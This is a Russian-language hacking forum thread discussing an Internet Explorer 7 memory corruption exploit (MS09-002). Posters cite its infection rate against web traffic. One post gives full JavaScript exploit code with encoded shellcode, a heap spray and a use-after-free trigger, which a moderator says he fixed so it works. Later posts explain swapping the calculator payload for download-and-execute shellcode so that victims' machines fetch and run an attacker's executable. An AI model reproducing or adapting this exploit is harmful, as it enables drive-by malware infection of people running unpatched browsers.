Сплойт ИЕ7, вин2к3&винХР

[Mr.Di]

http://www.shadowserver.org/wiki/pmwiki.ph...lendar.20081210
появился 10го декабря прошлого года, как я понял залатан не так давно.
http://milw0rm.com/exploits/7410 вроде как это сие
как он отрабатывает сейчас?

 

[DeusTirael]

Через пару дней после выхода пробив на трафе был около 5%.

 

[Mr.Di]

понятно всё с ним. думаю можно клозать тогда тему

 

[AKella]

Microsoft Internet Explorer 7 Memory Corruption PoC (MS09-002)

Цель: Microsoft Internet Explorer 7
Воздействие: Выполнение произвольного кода

Описание уязвимости:

* Множественные уязвимости в Microsoft Internet Explorer

Код эксплоита:

<script language="JavaScript">

var c = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

var array = new Array(); 

var ls = 0x100000-(c.length*2+0x01020); 

var b = unescape("%u0C0C%u0C0C"); 
while(b.length<ls/2) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 

for(i=0; i<0xC0; i++) { 
	array[i] = lh + c;
} 

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() { 
	o1=document.createElement("tbody"); 
	o1.click; 
	var o2 = o1.cloneNode();	
	o1.clearAttributes(); 
	o1=null; CollectGarbage(); 
	for(var x=0;x<a1.length;x++) a1[x].src=s1; 
	o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

[mod][DeusTirael:] Немного подправил код, ато не срабатывал.[/mod]

 

[lance]

На милворме под ie7 ещё пара версий эксплоита валяется.

 

[Pir4tt]

Тока у меня стабильно срабатывает, только тот что с таймаутом

 

[Mail2k]

А в этом сплойте Microsoft Internet Explorer 7 Memory Corruption PoC (MS09-002) ссылка на exe,который дожен грузиться при запуске сплойта где должна быть?

 

[Mr.Di]

Mail2k
глянь это лучше

 

[Mail2k]

Mail2k
глянь это лучше

Уже глянул, но вопрос сам собой не отпал. Просто не особо хорошо разбираюсь в сплойтах. Бывает смотришь код сплойта,как ,например,тот,на который ты скинул линк и думаешь,где тут править ссылку на свой exe...

 

[Mr.Di]

Меняешь шелл код на даунлон энд экзекут вместо того что есть. Представленный там должен запускать калькулятор на машине "жертвы"